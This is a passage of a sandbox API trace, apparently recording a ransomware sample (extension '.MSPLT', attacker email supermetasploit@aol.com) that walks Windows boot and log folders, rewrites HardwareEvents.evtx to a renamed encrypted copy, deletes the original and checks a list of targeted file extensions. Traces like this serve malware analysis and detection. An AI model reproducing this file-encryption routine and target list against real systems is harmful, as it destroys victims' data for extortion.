0x348 [0286.508] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=44888) returned 1 [0286.508] CloseHandle (hObject=0x348) returned 1 [0286.508] GetFileAttributesW (lpFileName="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui")) returned 0x20 [0286.508] GetFileAttributesW (lpFileName="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.508] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.509] lstrlenW (lpString="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui") returned 34 [0286.509] lstrlenW (lpString="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui") returned 34 [0286.509] lstrlenW (lpString=".doc") returned 4 [0286.509] lstrlenW (lpString="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui") returned 34 [0286.509] lstrlenW (lpString="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui") returned 34 [0286.509] lstrlenW (lpString=".doc") returned 4 [0286.509] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.509] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=77152) returned 1 [0286.509] CloseHandle (hObject=0x348) returned 1 [0286.510] GetFileAttributesW (lpFileName="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui")) returned 0x20 [0286.510] GetFileAttributesW (lpFileName="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.510] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.510] lstrlenW (lpString="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui") returned 34 [0286.510] lstrlenW (lpString="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui") returned 34 [0286.510] lstrlenW (lpString=".doc") returned 4 [0286.510] lstrlenW (lpString="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui") returned 34 [0286.510] lstrlenW (lpString="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui") returned 34 [0286.510] lstrlenW (lpString=".doc") returned 4 [0286.510] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.511] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=76128) returned 1 [0286.511] CloseHandle (hObject=0x348) returned 1 [0286.511] GetFileAttributesW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui")) returned 0x20 [0286.511] GetFileAttributesW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.511] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.511] lstrlenW (lpString="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 29 [0286.511] lstrlenW (lpString="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 29 [0286.511] lstrlenW (lpString=".doc") returned 4 [0286.511] lstrlenW (lpString="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 29 [0286.511] lstrlenW (lpString="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 29 [0286.511] lstrlenW (lpString=".doc") returned 4 [0286.512] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.512] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=44952) returned 1 [0286.512] CloseHandle (hObject=0x348) returned 1 [0286.512] GetFileAttributesW (lpFileName="C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui")) returned 0x20 [0286.512] GetFileAttributesW (lpFileName="C:\\Boot\\sv-SE\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.512] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.513] lstrlenW (lpString="C:\\Boot\\sv-SE\\memtest.exe.mui") returned 29 [0286.513] lstrlenW (lpString="C:\\Boot\\sv-SE\\memtest.exe.mui") returned 29 [0286.513] lstrlenW (lpString=".doc") returned 4 [0286.513] lstrlenW (lpString="C:\\Boot\\sv-SE\\memtest.exe.mui") returned 29 [0286.513] lstrlenW (lpString="C:\\Boot\\sv-SE\\memtest.exe.mui") returned 29 [0286.513] lstrlenW (lpString=".doc") returned 4 [0286.513] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.514] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=75096) returned 1 [0286.514] CloseHandle (hObject=0x348) returned 1 [0286.514] GetFileAttributesW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui")) returned 0x20 [0286.514] GetFileAttributesW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.514] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.514] lstrlenW (lpString="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 29 [0286.514] lstrlenW (lpString="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 29 [0286.514] lstrlenW (lpString=".doc") returned 4 [0286.514] lstrlenW (lpString="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 29 [0286.514] lstrlenW (lpString="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 29 [0286.514] lstrlenW (lpString=".doc") returned 4 [0286.515] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.515] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=45472) returned 1 [0286.515] CloseHandle (hObject=0x348) returned 1 [0286.515] GetFileAttributesW (lpFileName="C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui")) returned 0x20 [0286.515] GetFileAttributesW (lpFileName="C:\\Boot\\tr-TR\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.515] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.516] lstrlenW (lpString="C:\\Boot\\tr-TR\\memtest.exe.mui") returned 29 [0286.516] lstrlenW (lpString="C:\\Boot\\tr-TR\\memtest.exe.mui") returned 29 [0286.516] lstrlenW (lpString=".doc") returned 4 [0286.516] lstrlenW (lpString="C:\\Boot\\tr-TR\\memtest.exe.mui") returned 29 [0286.516] lstrlenW (lpString="C:\\Boot\\tr-TR\\memtest.exe.mui") returned 29 [0286.516] lstrlenW (lpString=".doc") returned 4 [0286.516] CreateFileW (lpFileName="C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.516] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=77152) returned 1 [0286.516] CloseHandle (hObject=0x348) returned 1 [0286.517] GetFileAttributesW (lpFileName="C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui")) returned 0x20 [0286.517] GetFileAttributesW (lpFileName="C:\\Boot\\uk-UA\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.517] CreateFileW (lpFileName="C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.517] lstrlenW (lpString="C:\\Boot\\uk-UA\\bootmgr.exe.mui") returned 29 [0286.517] lstrlenW (lpString="C:\\Boot\\uk-UA\\bootmgr.exe.mui") returned 29 [0286.517] lstrlenW (lpString=".doc") returned 4 [0286.517] lstrlenW (lpString="C:\\Boot\\uk-UA\\bootmgr.exe.mui") returned 29 [0286.517] lstrlenW (lpString="C:\\Boot\\uk-UA\\bootmgr.exe.mui") returned 29 [0286.517] lstrlenW (lpString=".doc") returned 4 [0286.517] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.518] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=63840) returned 1 [0286.518] CloseHandle (hObject=0x348) returned 1 [0286.518] GetFileAttributesW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui")) returned 0x20 [0286.518] GetFileAttributesW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.518] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.518] lstrlenW (lpString="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 29 [0286.518] lstrlenW (lpString="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 29 [0286.518] lstrlenW (lpString=".doc") returned 4 [0286.518] lstrlenW (lpString="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 29 [0286.518] lstrlenW (lpString="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 29 [0286.518] lstrlenW (lpString=".doc") returned 4 [0286.519] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.519] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=42400) returned 1 [0286.519] CloseHandle (hObject=0x348) returned 1 [0286.519] GetFileAttributesW (lpFileName="C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui")) returned 0x20 [0286.519] GetFileAttributesW (lpFileName="C:\\Boot\\zh-CN\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.519] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.520] lstrlenW (lpString="C:\\Boot\\zh-CN\\memtest.exe.mui") returned 29 [0286.520] lstrlenW (lpString="C:\\Boot\\zh-CN\\memtest.exe.mui") returned 29 [0286.520] lstrlenW (lpString=".doc") returned 4 [0286.520] lstrlenW (lpString="C:\\Boot\\zh-CN\\memtest.exe.mui") returned 29 [0286.520] lstrlenW (lpString="C:\\Boot\\zh-CN\\memtest.exe.mui") returned 29 [0286.520] lstrlenW (lpString=".doc") returned 4 [0286.520] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.521] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=63832) returned 1 [0286.521] CloseHandle (hObject=0x348) returned 1 [0286.521] GetFileAttributesW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui")) returned 0x20 [0286.521] GetFileAttributesW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.521] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.521] lstrlenW (lpString="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 29 [0286.521] lstrlenW (lpString="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 29 [0286.521] lstrlenW (lpString=".doc") returned 4 [0286.521] lstrlenW (lpString="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 29 [0286.521] lstrlenW (lpString="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 29 [0286.522] lstrlenW (lpString=".doc") returned 4 [0286.522] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.522] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=42328) returned 1 [0286.522] CloseHandle (hObject=0x348) returned 1 [0286.522] GetFileAttributesW (lpFileName="C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui")) returned 0x20 [0286.522] GetFileAttributesW (lpFileName="C:\\Boot\\zh-HK\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.523] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.523] lstrlenW (lpString="C:\\Boot\\zh-HK\\memtest.exe.mui") returned 29 [0286.523] lstrlenW (lpString="C:\\Boot\\zh-HK\\memtest.exe.mui") returned 29 [0286.553] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0286.648] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0286.648] CloseHandle (hObject=0x3f4) returned 1 [0286.648] GetFileAttributesW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx")) returned 0x20 [0286.649] GetFileAttributesW (lpFileName="C:\\Logs\\HardwareEvents.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\hardwareevents.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.650] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0286.650] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0286.650] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0286.650] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\hardwareevents.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0286.678] GetLastError () returned 0x0 [0286.679] ReadFile (in: hFile=0x42c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0286.756] WriteFile (in: hFile=0x434, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0286.760] ReadFile (in: hFile=0x42c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0286.760] WriteFile (in: hFile=0x434, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xfa, lpOverlapped=0x0) returned 1 [0286.760] SetEndOfFile (hFile=0x434) returned 1 [0286.761] CloseHandle (hObject=0x434) returned 1 [0286.763] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0286.764] SetEndOfFile (hFile=0x42c) returned 1 [0286.765] CloseHandle (hObject=0x42c) returned 1 [0286.765] SetFileAttributesW (lpFileName="C:\\Logs\\HardwareEvents.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0286.766] DeleteFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx")) returned 1 [0286.766] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0286.766] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0286.766] lstrlenW (lpString=".doc") returned 4 [0286.766] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0286.766] lstrlenW (lpString=".docx") returned 5 [0286.766] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0286.766] lstrlenW (lpString=".pdf") returned 4 [0286.766] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0286.766] lstrlenW (lpString=".xls") returned 4 [0286.766] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0286.766] lstrlenW (lpString=".xlsx") returned 5 [0286.766] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0286.766] lstrlenW (lpString=".ppt") returned 4 [0286.766] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0286.766] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0286.767] lstrlenW (lpString=".zip") returned 4 [0286.767] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0286.767] lstrlenW (lpString=".rar") returned 4 [0286.767] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0286.767] lstrlenW (lpString=".bz2") returned 4 [0286.767] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0286.767] lstrlenW (lpString=".7z") returned 3 [0286.767] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0286.767] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0286.767] lstrlenW (lpString=".dbf") returned 4 [0286.767] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0286.767] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0286.767] lstrlenW (lpString=".1cd") returned 4 [0286.767] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0286.767] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0286.767] lstrlenW (lpString=".jpg") returned 4 [0286.767] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0286.767] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0286.767] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0286.767] lstrlenW (lpString=".doc") returned 4 [0286.767] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0286.767] lstrlenW (lpString=".docx") returned 5 [0286.767] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0286.767] lstrlenW (lpString=".pdf") returned 4 [0286.767] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0286.767] lstrlenW (lpString=".xls") returned 4 [0286.768] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0286.768] lstrlenW (lpString=".xlsx") returned 5 [0286.768] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0286.768] lstrlenW (lpString=".ppt") returned 4 [0286.768] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0286.768] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0286.768] lstrlenW (lpString=".zip") returned 4 [0286.768] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0286.768] lstrlenW (lpString=".rar") returned 4 [0286.768] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0286.768] lstrlenW (lpString=".bz2") returned 4 [0286.768] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0286.768] lstrlenW (lpString=".7z") returned 3 [0286.768] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0286.768] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0286.768] lstrlenW (lpString=".dbf") returned 4 [0286.768] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0286.768] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0286.769] lstrlenW (lpString=".1cd") returned 4 [0286.769] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0286.769] lstrlenW (lpString="C:\\Logs\\HardwareEvents.evtx") returned 27 [0286.769] lstrlenW (lpString=".jpg") returned 4 [0286.769] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0286.769] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0286.769] lstrlenW (lpString="Key Management Service.evtx") returned 27 [0286.769] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0286.769] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0286.769] CloseHandle (hObject=0x42c) returned 1 [0286.770] GetFileAttributesW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx")) returned 0x20 [0286.770] GetFileAttributesW (lpFileName="C:\\Logs\\Key Management Service.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\key management service.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.770] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0286.770] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0286.770] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0286.770] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: 